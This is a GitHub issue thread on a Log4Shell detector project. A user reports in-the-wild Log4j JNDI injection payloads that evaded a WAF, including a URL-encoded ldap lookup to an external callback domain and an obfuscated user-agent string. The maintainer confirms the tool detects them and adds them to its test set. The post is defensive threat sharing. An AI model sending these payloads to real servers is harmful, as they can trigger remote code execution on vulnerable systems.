### ISSUE TITLE
New payloads

### ISSUE THREAD

**Issue by GH-Rake** [Neo23x0/log4shell-detector#47]
These payloads do not appear with a google or github search so I think they are new.  Cloudflare WAF has pretty good detection rules for this, but their WAF did not block these.

Please close this issue or do what you like with this information, I just wanted to share these somewhere where they may have some impact.  I did not test them with this repo.

IP:
89.248.173.140

path query:
/%3Fx=$%7Bjndi:ldap:/guidedhacking.com.c6tsifp2pij91e3kaft0cg7h1xayyyyyn.explorelocalpaths.com/a%7D

user agent:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{Hostname}}.c6tsifp2pij91e3kaft0cg7h1xayyyyyn.explorelocalpaths.com}

it appears their expansion of {{Hostname}} did not work as intended in the useragent

**Comment by Neo23x0** [comment]
The detection pads used in log4shell-detector should cover these payloads. 

-- update
And yes, they already do. However, I've added the strings to the test set. 

https://github.com/Neo23x0/log4shell-detector/commit/c20403589f8f2ffc818bb54b1312906ff0c0d9d6
